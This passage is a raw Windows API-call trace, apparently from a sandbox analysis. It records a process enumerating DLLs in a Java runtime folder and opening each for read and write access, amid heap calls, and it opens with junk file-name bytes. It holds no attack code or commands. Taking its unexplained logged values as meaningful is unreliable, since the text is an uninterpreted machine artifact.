ftCreationTime.dwLowDateTime=0xee850ebd, ftCreationTime.dwHighDateTime=0xa7aff929, ftLastAccessTime.dwLowDateTime=0xb5e59915, ftLastAccessTime.dwHighDateTime=0x440bcfca, ftLastWriteTime.dwLowDateTime=0x2151e7ab, ftLastWriteTime.dwHighDateTime=0x9d5ccc53, nFileSizeHigh=0xddea6e00, nFileSizeLow=0x5fea5054, dwReserved0=0x46730277, dwReserved1=0x3d81adf5, cFileName="ᡝ壌᷇偱౭掙ᵥ怖㉶攪잾擰댥ཛྷב૘稐뛄្뗸䀢崙๮ل?ꈇ泙뭴䥡㎸ފꜨ낱읢뫫瀹⣥璓?✗犲孓깏馕谔㋐ഓꨇ觘鉭咸戕凈⹐≽祵浧䶢ꌝ納ꟾ﬈ꘕ䇩霸뺵윍돁⎊撵쏫족熆삫뽓씴?芇ﺋ噶幸枕䇍伺佣뿧蠏ץ๺捤⥰例徛ᎂ盝翍렌빴鸶ഓꤟꗸ㑧Ṡ뷢䆌쁝続鲢ӍӅ滇?㊄慧↮昐튜홵ᄲ㎘⑝Ʂ憙控莛┰⋨즻⻷₤佹ゝ롯ᇛ좤홪墢⌴Ꜣ䊰宆樠篧隮꟎䱲㪄産药苐왯傄㟽쑶墮ཪ쟴ᴅ튧뗅ᆢ♎൚덕젇ᐋ꾻Í奡㰗?婒Oા㋂㔗⴫缆?쪏扉ꝣ⯖䲕?ᴗ뵿⻑冗⫦䒯㛗뺚̓啐璊瞉啐璊쥠뷈̓啧璊渘Ĉ㪀ā湈Ĉ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓̓⺊Ā렧焆먤聤̓㑍Ā̓腐\x07̓뻌聤蝈\x08̓⼫귌싮ബ໧궇䢷㌡檎錭⍫찦듸ੰ䆀褥킚Ļ伐䫘灮堐矉ꭸ嬩?傂뫕둪ɝ?Ꞙ随뗋䏘ṕ䩀ق뜥ᶿꟺ瘚፜?垭?施뫰禌ᮀ茡☆돵ᥡ㽧?⹘奝䓐๳烝ᇘ뾶ི?䰐豇ꦙ蟊半㋠傧굖鄭ㄓ䚁⿃鶓?\x01")) returned 0 [0090.950] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0090.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.951] AreFileApisANSI () returned 1 [0090.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll", lpUsedDefaultChar=0x0) returned 52 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.951] AreFileApisANSI () returned 1 [0090.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0090.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0090.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 52 [0090.952] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.952] GetFileType (hFile=0x418) returned 0x1 [0090.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0090.953] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.953] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.953] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.953] CloseHandle (hObject=0x418) returned 1 [0090.953] AreFileApisANSI () returned 1 [0090.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0090.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0090.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 52 [0090.954] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.954] GetFileType (hFile=0x418) returned 0x1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0090.954] CloseHandle (hObject=0x418) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.955] AreFileApisANSI () returned 1 [0090.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0090.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 52 [0090.955] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440)) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.955] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="dt_socket.dll", cAlternateFileName="DT_SOC~1.DLL")) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0090.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.956] AreFileApisANSI () returned 1 [0090.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll", lpUsedDefaultChar=0x0) returned 53 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.956] AreFileApisANSI () returned 1 [0090.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0090.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 53 [0090.957] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.957] GetFileType (hFile=0x418) returned 0x1 [0090.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0090.957] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.957] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.957] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.957] CloseHandle (hObject=0x418) returned 1 [0090.958] AreFileApisANSI () returned 1 [0090.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0090.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 53 [0090.958] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.958] GetFileType (hFile=0x418) returned 0x1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0090.958] CloseHandle (hObject=0x418) returned 1 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: 